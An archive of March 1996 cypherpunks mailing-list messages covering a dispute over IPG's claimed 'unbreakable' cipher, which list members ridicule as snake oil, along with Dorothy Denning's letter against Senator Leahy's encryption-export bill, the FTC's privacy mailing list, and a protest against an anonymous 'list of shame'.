Message-ID: <199603200310.TAA28716@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:45 PM 3/17/96 +0000, you wrote:
>Enclosed is an excerpt from Edupage. Snake-oil crypto popped into my 
>mind.... I wonder if the FTC (Federal Trade Commission... agency 
>*meant* to crack down on consumer fraud, for non-US readers here) 
>would ever get into act here.
....
>FTC TARGETS INTERNET FRAUD
>The Federal Trade Commission is conducting a "wholesale crackdown" on
>perpetrators of allegedly deceptive marketing schemes that are advertised in
>Internet news groups or on the World Wide Web.

Sure, they'll be happy to, if we really want.  The NSA will advise them
on what's good crypto, and what's snake-oil.  Certainly any system that
didn't provide for back-up key access doesn't rate......

No, I didn't think you wanted that either....

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Thu, 21 Mar 1996 05:59:51 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: The return of the IPG Unbreakable System (fwd)
Message-ID: <Pine.BSD/.3.91.960319162822.11284G-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



Derek and others, 

In view of the anonymous remailer's calim to have broken the simple 
system, which as you and others who have had the system for a period
time know, we have had some reservations about. 

The effect on the 5600 bit system, and the 12288 bit system, are unkown 
at this time. Our tests indicate that there is not any effect at all on 
the 12,288 bit system. The 5600 bit system, which is indentical to the 
system described in our release, except that the D values, are used as an 
index to one, or two tables of random characters, 512 characters, or 
2 - 256 characters, may be effected by a known plain text attack, we do 
not think so but we are running a battery of tests. 

The anonymous remailer may be able to confirm or deny that, since that 
person will presumably receive this letter. The addition is trival, that 
is the system is identicalin all respects to that set out, which was 
described accurately by the remailer, except that instead of XORing 
the D value, the D value is used as an index into a table(s) of random 
characters, that is the random seed is 5600 bits instead of 1792. 
That was one reason for providing large random seeds in our release. 
Our analysis as of 3:00pm CST 3-19-96, indicates that the D values are 
not recoverable, but we stand to be proven wrong. This system is only 
fractionally slower, for obvious reasons, than the simple one directly
using the D values directly, described previously. Incidentally, for 
those concerned, it is as you know, the one that the IPG software 
in your possesion uses.

Note: There was one error in the description, that is 13568 ANDed to the 
8 bit random seed to get starting A values, it is not a C word AND but 
the assembly langauge sequnce of moving successive AL values into AX, 
where AH is fixed at 35, thus the effect is the same as an add, 
(or a byte AND of the random charcter to a zero AL) - the result is 
a number in the range of 13,568 to 13,823.

Further, with respect to the simple system described in our release, 
we believe that the trimming procedure, that as some of you know, we used 
for another purpose - to eliminate the perceived problem of more frequent
close pairs, on the average more  0,0's as opposed to 0,255's, defeats the 
plain text attack, though it may require the jump start as we have 
described - running the system through a few iterations before commencing 
the actual encryption. The effect of this, as has been described to some 
of you, is that some of the D's are not used, that portion of each C 
value that is not an even multiple of 256, for example 14009 MOD 256 
is 185. Thus, those values where A[i] > 13824 are not used to XOR against 
the plain text - this is easily done in ASM by simply comparing the high 
order 8 bits, of A[i] with the high order 8 bits of C[i], if they are 
equal, then the XOR does not take place - thus the 64 interval is not 
applicable, it is variable depending upon the randomly selected C values.
Without having the known 64 interval as a constant, I believe that the 
system is still solid. As those of you heretofore privy to that 
information know, that modification to the system system takes about 
10% more time, than the system that was "cracked." Maybe, we need to do 
both this and use the 5600 byte system. We will appreciate any input in 
this regard. 

If we must go to the 12288 byte system, the system will be slower. 
However, as many of you know, it is still extremly fast but not as 
fast as either of the other two versions. With the 12,288 bit system. 
Our tests indicate that nothing but random values, can be obtained by 
either known plain text attack or by pattern recognition methodologies, 
those of which we are aware, on the 12,288 bit system.

Those of you who have had all of the materials will understand the 
foregoing. With the information provided heretofore, you can determine  
the effect on the other two systems. Also, those people will know my 
expressed fear of a premature announcement, such as that which has 
now been made, would have. This was the reason, that I resisted 
so strongly the release of the materials to the C'punks list 
though a few of you recommended that I do so. Perhaps we should have 
released everything? Who knows. However, in any case, that is water
over the dam and IPG must go on from here. It is only another of the many 
mistakes that we will undoubtedly make along the way. 

Having said that though, we must go back to our prior 
evaluation method, a strict confidential mode. However, I believe that we 
have added several very good additional people who can help to analyze 
the system.

In view of the willful violation of our confidential release, without 
knowing everything involved, and putting it out on the Internet, please 
be advised that other than those who have heretofore been evaluating the 
system, we will make no further releases except on a highly 
selective basis. The dozens of you who have requested copies of 
the materials,and have not yet received them, please be patient 
until we can get back on track. On a selected basis, we will provide then 
to you, after discussing it with each of you privately. Obviously, this 
breech occurred from yesterdays posting since no mention was made of the 5600 
bit or 12,288 bit random seed systems. Therefore, we intend to be very 
careful from now on. 

Accordingly, this will be the last letter posted to the entire 
cypherpunks list for the time being. If any reader posts something to the 
entire Cypherpunks list, do not expect any response to from IPG, there 
will be none.

Perhaps a battle has been lost, maybe even probably? But the war is not 
over, not by a long shot - with minor modifications this system is 
absolutely secure as events will prove. However, be assured that we 
will not sell our product to anyone until that can be definitively 
established. We greatly appreciate the contribution of some of those on 
the cypherpunks mailing list, including the anonymous remailer, have 
made. We hope that someway can be found for that person to continue 
to cooperate with us, since we are herein obviously providing 
information that can be evaluated. If that person will communicate with 
us privately, in remailer form, including a PGP public key, we will post
our response to the C'Punks list in encrypted form, or suggest an 
alternate approach.

To many of you, you will be hearing from us tomorrow - to the remaining 
of you, some of whom have objected to our providing you with unsolicited 
information, which we mistakenly thought that you would want, you 
will hear from us soon, depending upon the findings made by your 
C'punk list associates and others.

Thanks kindly,

Ralph






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Thu, 21 Mar 1996 05:53:42 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Would the FTC crack down on snake oil someday?
In-Reply-To: <Pine.LNX.3.91.960318163654.295A-100000@gak>
Message-ID: <314F5B53.6B07@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. wrote:
> On Sun, 17 Mar 1996, Deranged Mutant wrote:
> 
> > Enclosed is an excerpt from Edupage. Snake-oil crypto popped into my
> > mind.... I wonder if the FTC (Federal Trade Commission... agency
> > *meant* to crack down on consumer fraud, for non-US readers here)
> > would ever get into act here.
> >
> > Does the FTC have a home page? (Guess I'll do a search...)
> 
> http://www.ftc.gov .

Cool. They now have a privacy mailing list...
(Check out http://www.ftc.gov/ftc/privacy.htm)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 21 Mar 1996 03:34:19 +0800
To: cypherpunks@toad.com
Subject: FTC's privacy list (was "Welcome to privacy")
Message-ID: <199603200137.UAA06964@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


I subscribed to the FTC (Federal Trade Comission) Privacy list. I'll 
lurk a bit [discipline indeed] and see who and what's there.  Could be 
interesting.

--Rob

------- Forwarded Message Follows -------

Welcome to the privacy mailing list!
[..]
Here's the general information for the list you've
subscribed to, in case you don't already have it:

ABOUT THE PRIVACY MAILING LIST

Welcome to the Federal Trade Commission's Bureau of Consumer
Protection Privacy Principles mailing list.  The Bureau has
established this list as a forum for discussing the privacy
principles that should be applicable to consumers' use of the
Global Information Infrastructure.  The Bureau seeks commentary
and resource materials from consumers, industry, privacy
advocates and others who are concerned about questions such as
the following:

What information is routinely gathered online now, and what is
industry doing with this information?  How will the nature of the
information gathered or the uses to which it is put change in the
next few years?

What control should consumers have over personal and
transactional information?

How should consumers be able to exercise that control?

What expectations do consumers have regarding the use of
information about them?

What are the respective obligations of online service providers,
content providers, and consumers themselves to address these
privacy concerns?

Should certain uses of information be off limits without the
consumer's explicit consent?

Under what circumstances should consumers have the ability to
access and correct information about them?

Additional related topics for discussion are welcome.  The
dialogue that takes place in response to these questions will be
invaluable to the Bureau.  It will facilitate the creation
of a set of voluntary principles governing the use of consumer
information in transactions in cyberspace. 

To post messages to this list, simply address your mail to:

     privacy@ftc.gov
[..]






Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 22 Mar 1996 01:08:36 +0800
To: cypherpunks@toad.com
Subject: Dorothy Denning attacks Leahy's crypto bill
Message-ID: <Pine.3.89.9603192113.A23263-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


I may have to adjust my position on Leahy's bill. Any legislation that
Dorothy Denning attacks so virulently must be worth passing. 

-Declan

-------------------------------------------------------------------------

Date: Tue, 19 Mar 96 14:53:35 EST
From: denning@cs.cosc.georgetown.edu (Dorothy Denning)
To: farber@central.cis.upenn.edu
                                                   March 14, 1996
                                        
The Honorable Patrick Leahy
United States Senate
Russell Building, Room 433
1st and C Streets, NE
Washington, DC 20510

Dear Senator Leahy:

As author, scholar, lecturer, researcher, and consultant to the
government and industry in cryptography and information security, I am
concerned that S.1587, the "Encrypted Communications Privacy Act of
1996," is not in balance with society's needs.  By removing practically
all export controls on encryption, the bill will make it far easier for
criminals, terrorists, and foreign adversaries to obtain and use
encryption that is impenetrable by our government.  The likely effect
will be to erode the ability of our law enforcement and intelligence
agencies to carry out their missions.  This is not consistent with your
own findings in the bill which recognize the need for a "national
encryption policy that advances the development of the national and
global information infrastructure, and preserves Americans' right to
privacy and the Nation's public safety and national security."

I am concerned that the proposed legislation responds only to a loud
cry for assistance and is not the reasoned and practiced position of
our multinational corporations.  At the International Cryptography
Institute, which I chaired in September 1994 and 1995, our discussions
did not find that this unrestricted distribution of encryption
technology was required to satisfy business objectives.  Our
corporations recognize the need to respect the legitimate interests of
governments and the need for encryption methods that use "key escrow"
or "trusted third parties" with data recovery capabilities to protect
their own information assets.  Businesses are moving in the direction
of key escrow, and key escrow is becoming a standard feature of
commercial products.  I have recently summarized the features of thirty
products and proposals for key escrow in a taxonomy which I developed
with Dennis Branstad.

Because of the need to address information security at an international
level, the Organization for Economic Cooperation Development, through
its Committee for Information, Computer, and Communications Policy, is
bringing together the international business community and member
governments to develop encryption policy guidelines that would respect
the interests of businesses, individuals, and governments.  In support
of that objective, the INFOSEC Business Advisory Group (IBAG), an
association of associations representing the information security
interests of users, issued a statement of principles recognizing the
needs of governments, industry, and individuals, and supporting
approaches based on trusted third parties.  A similar statement was
issued by a quadripartite group consisting of EUROBIT (European
Association of Manufacturers of Business Machines and Information
Technology Industry), ITAC (Information Technology industry Association
of Canada), ITI (Information Technology Industry Council, U.S.), and
JEIDA (Japan Electronic Industry Development Association), which
accounts for more than 90% of the worldwide revenue in information
technology.  X/Open is pursuing a public key infrastructure project
aimed at creating specifications and possibly operating manuals that
could be used in conformance testing and site accreditation of trusted
parties.

The European Commission has proposed a project to establish a
European-wide network of trusted parties that would be accredited to
offer services that support digital signatures, notarization,
confidentiality, and data integrity.  The trust centers, which would be
under the control of member nations, would hold keys that would enable
them to assist the owners of data with emergency decryption or supply
keys to their national authorities on production of a legal warrant.

Within the U.S., the Clinton Administration is developing federal
standards for key escrow encryption (these are in addition to and more
general than the original Clipper standard, FIPS 185), adopting
escrowed encryption within the federal government, and liberalizing
export controls on encryption products that include an acceptable
system of key escrow.  The Administration's policy has considerable
flexibility, allowing for both hardware and software implementations,
classified and unclassified algorithms, and government and private
sector key holders.  Some companies have submitted products for review
under the liberalized export controls for key escrow encryption.
Trusted Information Systems has already received approval for their
Gauntlet firewall.

Industry is also developing cryptographic application programming
interfaces (CAPIs), which will facilitate the inclusion of
cryptographic services in applications, networks, and operating
systems.  This approach, recently demonstrated by Microsoft, will allow
U.S. software companies to develop exportable applications and systems
that run with separate security modules.  These modules can provide
either domestic grade encryption or exportable encryption.  The impact
of export controls will thus be limited to those companies selling
encryption modules, not the entire U.S. hardware and software
industry.  Even this impact can be made negligible by allowing
companies to export security modules with strong encryption where the
keys are held with escrow agents in the purchaser's country.  Bilateral
mutual assistance agreements could ensure that U.S.  law enforcement
agencies are able to obtain decryption assistance if the exported
module is used in a crime against the U.S.  CAPIs are providing the
technological base for experiments under the International Cryptography
Experiment (ICE), an informal international alliance of individuals and
organizations working together to promote the international use of
encryption within import and export regulations that respect law
enforcement and national security interests.

As these examples illustrate, businesses and governments are working
hard to establish policies and technologies that respect the needs of
users, industry, and governments in the furtherance of a secure global
information infrastructure.  Considerable progress has been made during
the past year.  The export provisions in S.1587 are likely to undermine
those efforts by satisfying the immediate export demands of a few U.S.
companies at the expense of other stakeholders and society at large.
It will undermine the ability of governments worldwide to fight global
organized crime and terrorism.

Although some U.S. companies have lost sales because of export controls
on encryption, the overall impact of these controls on the U.S.
information technology industry as a whole is much less clear.  In the
most comprehensive study of export controls to date, the Department of
Commerce and National Security Agency found that in all but three
countries surveyed, sources indicated that U.S. market share (about 75%
overall) was keeping pace with overall demand.  Most of the impact was
found to be on the sale of security-specific products, which account
for only a small percentage of the total market, rather than
general-purpose software products.  Sales of security-specific products
are generally few and mostly to customers within the country where the
product originates.  Visits to 50 computer and software stores in
Canada, France, Germany, Japan, S. Korea, Thailand, and the U.K. found
that all the general-purpose software products with encryption were
from U.S. manufacturers.  The study concluded that "the impact of U.S.
export controls on the international market shares of general-purpose
products is probably negligible" and that "the export licensing process
itself is not a major obstacle to U.S. competitiveness."  This is in
stark contrast to the dire prediction of the Computer Systems Policy
Project that U.S.  industry stands to lose $30-60 billion in revenues
by the year 2000 because of export controls.

The Commerce/NSA study did acknowledge that the existence of foreign
products claiming strong encryption could have a negative effect on
U.S. competitiveness.  However, by allowing encryption services to be
sold separately from the applications software that uses them, CAPIs
will make it extremely unlikely that general-purpose software will be
substantially effected by export controls.  Even security-specific
products, which are a growing industry, can use CAPIs to separate out
the encryption component from the main product (e.g., firewall).
Moreover, if keys can be held in other countries under appropriate
bilateral agreements as noted earlier, export controls need not
substantially impact encryption products.

Export controls are often blamed for the lack of security in our public
infrastructure.  The Commerce/NSA study found "little evidence that
U.S. export controls have had a negative effect on the availability of
products in the U.S. marketplace," although they "may have hindered
incorporation of strong encryption algorithms in some domestic
mass-market, general-purpose products."  There are many factors which
have played an even larger role in the general lack of security we find
on the Internet: the high cost and low demand for security, the
difficulty of designing systems that are secure, pressure to bring new
products to market before their security implications are understood,
the willingness of users to take risks in favor of acquiring new tools
and services, and lack of a public key infrastructure to support
encryption on a national and international basis.  Many systems are so
riddled with security holes that any would-be attacker can gain access
to the system itself, and from there access to plaintext data and
keys.  Malicious code can be injected into a victim's system through
electronic mail, documents, images, and web browsers; once there, it
can transmit sensitive data back to its owner.  Keyboard sniffers can
capture a user's keystrokes before they are ever encrypted.  Thus,
while export controls have played a part in the slow integration of
strong encryption into software and systems, they are not responsible
for most of the security vulnerabilities we see today.  Moreover, most
of these vulnerabilities are remedied with non-cryptographic controls
(e.g., process confinement, trusted systems engineering, biometrics,
and location-based authentication) or with cryptographic techniques for
authentication, data integrity, and non-repudiation, which are exempt
from State Department export controls.  I do not mean to suggest that
encryption is not important.  In fact, it is essential to protect
against certain threats.  However, it must be kept in perspective.  The
use of encryption for confidentiality protection is but one small,
albeit important, piece of an information security program.

The provisions is S.1587 regarding trusted key holders could have the
benefit of increasing public trust in key holders.  However, I have
some concern that the current provisions may be overly restrictive.
Thus far, we have practically no experience with the operation of third
party key holders and the circumstances under which they will be called
upon to provide keys or decryption assistance.  It will be extremely
important that the provisions allow enough flexibility to accommodate
legitimate use of the data recovery services of key holders for
criminal investigations, civil litigation, and intelligence
operations.  The liability risks to key holders should not be onerous.
The definition of key holder and exact wording in the bill may also
need some refinement in order to accommodate existing and proposed
methods of trusted third party encryption.

Encryption policy is a difficult and often emotional issue.  It is
important that Congress work closely with the Administration, industry,
and other interested parties to develop the best legislative strategy
for promoting information security on the national and global
information infrastructure without diminishing the ability of our law
enforcement and intelligence agencies to protect the public safety and
national security.  Export liberalization should proceed cautiously,
tied to key escrow or other methods that accommodate the needs of the
government as well as those of users and industry.  The
Administration's plans to liberalize export controls on software key
escrow is a good next step.  As trust and confidence in key escrow
grows, the export of virtually unlimited strength encryption systems
may be possible.  Because export controls are our only lever for
controlling the spread of encryption, they should be used to their full
advantage.  Decisions to liberalize these controls must be fully
informed by classified national security information as well as by
economic analysis and market studies.

Law enforcement agencies are encountering encryption with ever greater
frequency.  Within a few years, the successful execution of practically
all court-ordered intercepts and searches and seizures is likely to
depend on their ability to decrypt communications and stored
information.  If the encryption cannot be broken, it could be
impossible to successfully investigate or prosecute those cases.
Crimes of terrorism and white collar crime, including fraud,
embezzlement, and money laundering, would be facilitated and perhaps
impossible to solve.  Even crimes of economic espionage, which often
involve insiders with access to company secrets, are facilitated with
encryption.  It will be important for Congress to closely monitor the
impact of encryption on law enforcement and use that information to
guide any encryption legislation.

In summary, our national policy can and must promote the legitimate use
of strong encryption for information protection without unnecessarily
hindering the ability of our law enforcement and intelligence agencies
to do their jobs.  In so doing, the policy can accommodate reasonable
liberalization of export controls and business objectives without
undermining other national objectives.  Such a policy is consistent
with your own guiding principle for the bill: "Encryption is good for
American business and good business for Americans."  But it goes
further in order to be equally guided by the principle that law and
order and national security are essential for the American economy and
the American people.  It is not necessary to so radically lift export
controls on encryption in order to accommodate both principles.

I will be pleased to meet with you and the committee for comment and
questioning, or to assist in any way I can with the development of a
balanced approach to encryption legislation.

Yours respectfully,

Dr. Dorothy E. Denning
Professor of Computer Sciences
Georgetown University
denning@cs.georgetown.edu
http://www.cosc.georgetown.edu/~denning








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crisper <crisper@ascensionet.com>
Date: Thu, 21 Mar 1996 22:46:47 +0800
To: cypherpunks@toad.com
Subject: Mailing Lists
Message-ID: <314F7823.487D@ascensionet.com>
MIME-Version: 1.0
Content-Type: text/plain


Could anyone direct me to some other mailing lists dealing with either 
computer security or current communication technology, routers,modems 
etc.  Thank you ahead of time.  Also could anyone direct me to some good 
beginner books on cryptography of computer security. When referring 
books could you make them recent so that they would be regularly 
available at Barnes&Noble or Borders.  

Thanks






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Fri, 22 Mar 1996 01:07:58 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: The return of the IPG Unbreakable System (fwd)
In-Reply-To: <Pine.BSD/.3.91.960319162822.11284G-100000@citrine.cyberstation.net>
Message-ID: <199603200620.WAA04433@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: IPG Sales <ipgsales@cyberstation.net>]
[Cc: cypherpunks@toad.com]
[Subject: Re: The return of the IPG Unbreakable System (fwd) ]
[In-reply-to: Your message of Tue, 19 Mar 96 19:24:42 CST.]
             <Pine.BSD/.3.91.960319162822.11284G-100000@citrine.cyberstation.net> 

IPG sales ranted:
>Note: There was one error in the description, that is 13568 ANDed to the 
>8 bit random seed to get starting A values, it is not a C word AND but 
>the assembly langauge sequnce of moving successive AL values into AX, 
>where AH is fixed at 35, thus the effect is the same as an add, 
>(or a byte AND of the random charcter to a zero AL) - the result is 
>a number in the range of 13,568 to 13,823.

Your world-beater algorithm is coded in 286 assembler???

Give up now. Your reputation capital has gone through 0 and is now
negative, and I don't think the Universe can tolerate this situation.

>Accordingly, this will be the last letter posted to the entire 
>cypherpunks list for the time being. If any reader posts something to the 
>entire Cypherpunks list, do not expect any response to from IPG, there 
>will be none.

Yayyyy!!!

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMU99ZoHskC9sh/+lAQFa7wQAt2s9yOknvE9nBk3agFlXJYGyTV2ZpZuf
gxrOb35ZV03xZPhHWvqPPv3pFgDTC0O3FBW7IULrIcTpJzZ/ULNcOwpQMEhaRjVo
JZ8dud3GUPKU3ses92pBK0MIA2ydDeayXGMXrlFAX3ebF+32VekYZzJzaOFz8KfY
aX9bvGoQYqE=
=tQdN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Fri, 22 Mar 1996 01:07:45 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: The return of the IPG Unbreakable System (fwd)
In-Reply-To: <Pine.BSD/.3.91.960319162822.11284G-100000@citrine.cyberstation.net>
Message-ID: <199603200621.WAA04569@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: IPG Sales <ipgsales@cyberstation.net>]
[Cc: cypherpunks@toad.com]
[Subject: Re: The return of the IPG Unbreakable System (fwd) ]
[In-reply-to: Your message of Tue, 19 Mar 96 19:24:42 CST.]
             <Pine.BSD/.3.91.960319162822.11284G-100000@citrine.cyberstation.net> 

IPG sales ranted:
>Note: There was one error in the description, that is 13568 ANDed to the 
>8 bit random seed to get starting A values, it is not a C word AND but 
>the assembly langauge sequnce of moving successive AL values into AX, 
>where AH is fixed at 35, thus the effect is the same as an add, 
>(or a byte AND of the random charcter to a zero AL) - the result is 
>a number in the range of 13,568 to 13,823.

Your world-beater algorithm is coded in 286 assembler???

Give up now. Your reputation capital has gone through 0 and is now
negative, and I don't think the Universe can tolerate this situation.

>Accordingly, this will be the last letter posted to the entire 
>cypherpunks list for the time being. If any reader posts something to the 
>entire Cypherpunks list, do not expect any response to from IPG, there 
>will be none.

Yayyyy!!!

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMU99ZoHskC9sh/+lAQFa7wQAt2s9yOknvE9nBk3agFlXJYGyTV2ZpZuf
gxrOb35ZV03xZPhHWvqPPv3pFgDTC0O3FBW7IULrIcTpJzZ/ULNcOwpQMEhaRjVo
JZ8dud3GUPKU3ses92pBK0MIA2ydDeayXGMXrlFAX3ebF+32VekYZzJzaOFz8KfY
aX9bvGoQYqE=
=tQdN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crisper <crisper@ascensionet.com>
Date: Thu, 21 Mar 1996 22:57:36 +0800
To: cypherpunks@toad.com
Subject: Internet Information
Message-ID: <314F7B76.C8A@ascensionet.com>
MIME-Version: 1.0
Content-Type: text/plain


Iwas wondering if anyone could pint me to a DETAILED description of the 
internet routing system.  Basically how a message gets from my computer 
to another lets say in Europe.  No need for simplicity I would like a 
real description.  Dont worry abpout protocols just where my message 
goes.  Also does anyone have a list of where the net's routers are 
located and who runs them.  Also their respective routing speeds at the 
current times.

Thank You ahead of time!
crisper





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Fri, 22 Mar 1996 01:08:28 +0800
To: ipgsales@cyberstation.net (IPG Sales)
Subject: Re: The return of the IPG Unbreakable System (fwd)
In-Reply-To: <Pine.BSD/.3.91.960319162822.11284G-100000@citrine.cyberstation.net>
Message-ID: <960319.234719.5k3.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, ipgsales@cyberstation.net writes:

> In view of the willful violation of our confidential release, without 
> knowing everything involved, and putting it out on the Internet, please 
> be advised that other than those who have heretofore been evaluating the 
> system, we will make no further releases except on a highly 
> selective basis.

I submit that this is what one would expect when one sends supposedly
confidential material out in the absence of binding NDAs.

IPG, why don't you simply post the source code to your system?  I know
I've suggested this before, but it bears repeating that any truly secure
cryptosystem depends _only_ on the secrecy of the key.  The algorithm
should be able to be published in the New York Times with no compromise
to the security of the system.  If this is not the case for your system,
than perhaps you should be considering alternative entrepreneurial
exploits.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org
                   "I'm a family man, model citizen."
                                      -- Warren Zevon

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMU+dlBvikii9febJAQFQVgP/c1N4VEpsaW7CN27HqIG4yvtsSUGOY2yK
iyiVSdXX7FrL6KqGCI2Ei0IckUoBiwDWau9Qwg35ZSllnXqTcEDQ9P4jpd5kz6jS
SCpsdwbEFSmn3rhR9Lgo+B1kSIlkG3hGFQMfEai6owgO+Y1IISoKFds4L8epAaCu
74uomtLh2zc=
=MRGE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Mar 1996 14:35:34 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: snake oil refining
Message-ID: <199603200745.CAA01136@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



IPG Salesdroid says:
> In view of the willful violation of our confidential release, without 
> knowing everything involved, and putting it out on the Internet, please 
> be advised that other than those who have heretofore been evaluating the 
> system, we will make no further releases except on a highly 
> selective basis.

Why? After all, the first lot of information proved to be worthless
(in the literal sense of having no economic value, it being a hunk of
junk). I can hardly see how you can complain about the result -- I
mean, it isn't like your encryption system was worth anything in the
first place, so it was hardly lowered in value.

I find it amusing how slippery the snake oil you peddle is,
however. This morning you claimed that several "cypherpunks" had been
sent information on your system and claimed it was "unbreakable". As
soon as a couple of cypherpunks note that what they were sent was
garbage, you claim, and I quote:

> In view of the anonymous remailer's calim to have broken the simple 
> system, which as you and others who have had the system for a period
> time know, we have had some reservations about. 

Ah, yes. This morning, unbreakable. Tonight "we had some reservations
about".

Why don't you stop wasting everyone's time? You can probably have a
fine career selling penny stocks or something.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Thu, 21 Mar 1996 03:09:14 +0800
To: cypherpunks@toad.com
Subject: IPG message
Message-ID: <199603200258.CAA11403@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


could some kind person that got IPGs' many time pad thing post it
somewhere so people that never got a copy can see it????????



thanks.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 21 Mar 1996 14:46:00 +0800
To: anonymous-remailer@shell.portal.com
Subject: A MODEST PROPOSAL
In-Reply-To: <199603201016.CAA09094@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.960320063446.5470A-100000@crl13.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 20 Mar 1996 anonymous-remailer@shell.portal.com wrote:

> THE LIST OF SHAME:
> B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
> M. Blaze: mab@crypto.com, mab@research.att.com
> J. Bizdos: jim@rsa.com
> S. Safaddar: shabbir@vtw.org
> D. Weinstein: djw@vplus.com
> P.. Peterson: padgett@hobbes.orl.mmc.com
> B. Stewart: stewarts@ix.netcom.com
> B. Unicorn: unicorn@schloss.li
> P. Karn: karn@unix.ka9q.ampr.org
> D. McCullagh: declan@well.com
> 
> BOYCOTT APPLIED CRYPTOGRAPHY, AT&T, VTW, and RSA!!!!
> 
> THE LEAHY BILL IS 100% PART OF THE PLAN TO KILL FREE CRYPTO.
> YOU DON'T NEED EXPERTS TO THINK FOR YOU! REMEMBER RICO AND WORLD GOVERNMENT!

I have to admit I haven't read the Leahy bill in detail.  But
I do get a little hinky whenever Congress tries to "help" us, 
so it seems reasonable to look for the worm in every legislative 
apple--the Leahy bill included.

Having said that, I am totally put off by the gradiose and 
devisive ravings of this commentator.  During the Second World 
War the Nazis required Jews in the occupied countries to wear a
yellow star of David to identify themselves.  In Denmark, the
king so identified himself, and soon so did most of his subjects. 

In that grand tradition of solidarity with persecuted minorities 
I request that I be added to anonymous' "LIST OF SHAME."  It is 
MY protest against this utter nonsense.  (I have always felt 
cheated that I was too young and politically naive to make the 
Nixon Enemies List.  I've made it up some since then with a fat 
FBI file, but it just isn't the same.)

A CYPHERPUNK CALL TO ARMS!!!

(Did I get the style right?)  C'punks, if you feels as I do, 
please take a few moments to sign up for the LIST OF SHAME?  
Let's show Bill, Bruce, Matt and all the others what most 
Cypherpunks really think about them and Mr/Ms Anonymous.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Thu, 21 Mar 1996 03:14:56 +0800
To: cypherpunks@toad.com
Subject: Re: IPG message
Message-ID: <2.2.32.19960320161456.012102e0@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:58 AM 3/20/96 GMT, ECafe Anonymous Remailer wrote:
>could some kind person that got IPGs' many time pad thing post it
>somewhere so people that never got a copy can see it????????
>
>
>
>thanks.
>
>
>
>
>
>
>
IPG wrote:

Obviously, you meet our requirementsfor the release of the IPG ABC 
Encryption algorithms. We need no further information from you. though we 
would appreciate your telephone num and snail mail address. 

The algorithms detailed below are copyrighted 1995 and 1996 by Internet 
Privacy Guaranteed, Seymour, TX. All rights are reserved. You may not
provide them to any other party, or parties, by any means or 
any media, without the expressed written permission of Internet Privacy 
Guaranteed. What is specially claimed as copyrighted and or patentable are:

     1. The use of the word Ultima for the system, because it is 
        impossible to have a either a more secure system - it is 
